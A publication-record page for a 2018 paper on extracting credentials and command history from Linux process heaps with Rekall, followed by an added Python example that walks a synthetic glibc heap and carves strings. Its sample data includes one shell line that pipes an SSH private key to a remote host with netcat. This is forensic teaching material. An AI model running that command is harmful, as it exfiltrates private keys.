Linux Memory Forensics: Expanding Rekall Userland Investigation

Stadlinger J, Block F, Dewald A (2018)
Publication Language: English

Publication Type: Conference contribution, Original article

Publication year: 2018

Conference Proceedings Title: 2018 11th International Conference on IT Security Incident Management & IT Forensics (IMF)

Event location: Hamburg DE

DOI: 10.1109/IMF.2018.00010

Abstract

Memory forensics is becoming more important in forensic investigations as a way of obtaining valuable data from a running system. Besides kernel artifacts, the heap of a user space process can hold plenty of interesting data, but that area has not yet received the attention it deserves in the forensic field. This paper shows that the heap of user applications can be a rich source of information, including data such as credentials, that can be helpful in a forensic investigation. With the help of the HeapAnalysis plugins previously published by Block, we examined the heap of selected Linux userland software and identified data of interest as well as certain application-internal structures that link those data snippets together. The result of our analysis is a set of plugins for the Rekall framework that enable an investigator to automatically extract process-related information such as login credentials, command history and file information for those applications.
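The abstract describes walking a process heap to recover data of interest and to tell live allocations from stale ones. The following is an added illustration of that idea and is not the paper's Rekall plugins or the HeapAnalysis code: it assumes the 64-bit glibc malloc chunk layout (16-byte header of prev_size and size, the in-use state of a chunk stored in the PREV_INUSE bit of the following chunk, a top chunk at the end of the region) and builds a small synthetic heap in code, so the "credential" and "command history" bytes are constructed sample data, not a real process image. The helper names (build_heap, walk_chunks, carve_strings, find_credential_like) are hypothetical.

```python
"""Walk a synthetic 64-bit glibc heap region, label chunks in-use/free and carve strings.

Added example, not code from the paper or from Rekall. Assumes the x86-64 glibc
malloc chunk layout; the heap bytes are constructed here, not dumped from a process.
"""
import re
import struct

CHUNK_HDR = 16      # prev_size (8 bytes) + size (8 bytes)
MIN_CHUNK = 32      # smallest chunk glibc hands out on x86-64
PREV_INUSE = 0x1    # set in a chunk's size field when the previous chunk is allocated
SIZE_BITS = 0x7     # PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA live in the low bits


def _chunk_size(payload_len: int) -> int:
    # glibc rounds header + request up to a 16-byte multiple, never below MIN_CHUNK
    return max(MIN_CHUNK, (CHUNK_HDR + payload_len + 15) & ~15)


def build_heap(allocs, top_size=0x200) -> bytes:
    """Assemble a heap from (payload, in_use) pairs followed by a top chunk.

    The in-use state of chunk i is written into chunk i+1's PREV_INUSE bit, as glibc
    does. For a freed chunk the first 16 bytes of user data are overwritten (fd/bk
    pointers in the real allocator; zeroed here, a simplification).
    """
    out = bytearray()
    prev_in_use, prev_size = True, 0
    for payload, in_use in allocs:
        size = _chunk_size(len(payload))
        flag = PREV_INUSE if prev_in_use else 0
        out += struct.pack('<QQ', 0 if prev_in_use else prev_size, size | flag)
        body = payload if in_use else b'\x00' * 16 + payload[16:]
        out += body.ljust(size - CHUNK_HDR, b'\x00')
        prev_in_use, prev_size = in_use, size
    flag = PREV_INUSE if prev_in_use else 0
    out += struct.pack('<QQ', 0 if prev_in_use else prev_size, top_size | flag)
    out += b'\x00' * (top_size - CHUNK_HDR)
    return bytes(out)


def walk_chunks(heap: bytes):
    """Return a dict per non-top chunk: offset, size, in_use flag and user data."""
    raw, off = [], 0
    while off + CHUNK_HDR <= len(heap):
        _, size_field = struct.unpack_from('<QQ', heap, off)
        size = size_field & ~SIZE_BITS
        if size < MIN_CHUNK or off + size > len(heap):
            raise ValueError(f'corrupt size field at offset {off:#x}')
        raw.append((off, size, size_field & PREV_INUSE))
        off += size
    chunks = []
    # the last raw entry is the top chunk; it only supplies the in-use bit of its predecessor
    for (off, size, _), (_, _, next_prev_inuse) in zip(raw, raw[1:]):
        chunks.append({'offset': off, 'size': size, 'in_use': bool(next_prev_inuse),
                       'data': heap[off + CHUNK_HDR:off + size]})
    return chunks


PRINTABLE = re.compile(rb'[\x20-\x7e]{4,}')
CRED_HINT = re.compile(r'(?i)(pass(word)?|secret|token)\s*[=:]')


def carve_strings(chunks):
    """(absolute offset, chunk in_use, text) for every printable run in every chunk.

    Freed chunks are carved too: stale data in them is exactly what an investigator
    may be after, so the in_use flag is reported rather than used as a filter.
    """
    found = []
    for c in chunks:
        for m in PRINTABLE.finditer(c['data']):
            found.append((c['offset'] + CHUNK_HDR + m.start(), c['in_use'],
                          m.group().decode('ascii')))
    return found


def find_credential_like(chunks):
    return [hit for hit in carve_strings(chunks) if CRED_HINT.search(hit[2])]


# Constructed sample heap: a request buffer, a live credential, a freed shell
# history line and a binary allocation. None of this comes from a real process.
SAMPLE_HEAP = build_heap([
    (b'GET /index.html HTTP/1.1', True),
    (b'password=hunter2', True),
    (b'history: cat ~/.ssh/id_rsa | nc 10.0.0.5 4444', False),
    (b'\x01\x02\x03\x04', True),
])

if __name__ == '__main__':
    for c in walk_chunks(SAMPLE_HEAP):
        print(f"{c['offset']:#06x} size={c['size']:<4} {'live' if c['in_use'] else 'free'}")
    for off, in_use, text in carve_strings(walk_chunks(SAMPLE_HEAP)):
        print(f"{off:#06x} {'live' if in_use else 'free'} {text!r}")
```

The walker deliberately reports strings from freed chunks as well as live ones: a freed history line or password buffer often survives until the allocator reuses the chunk, and the in_use label lets the investigator weigh how current the data is. On a real image the region boundaries would come from the process's VMA list and the chunk sizes from the arena, and tcache and fastbin chunks keep extra metadata in their user data, so the simple "first 16 bytes are clobbered" rule above is only an approximation.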

How to cite

APA:

Stadlinger, J., Block, F., & Dewald, A. (2018). Linux Memory Forensics: Expanding Rekall Userland Investigation. In IEEE Computer Society (Eds.), 2018 11th International Conference on IT Security Incident Management & IT Forensics (IMF). Hamburg, DE.

MLA:

Stadlinger, Johannes, Frank Block, and Andreas Dewald. "Linux Memory Forensics: Expanding Rekall Userland Investigation." Proceedings of the 11th International Conference on IT Security Incident Management & IT Forensics (IMF 2018), Hamburg Ed. IEEE Computer Society, 2018.
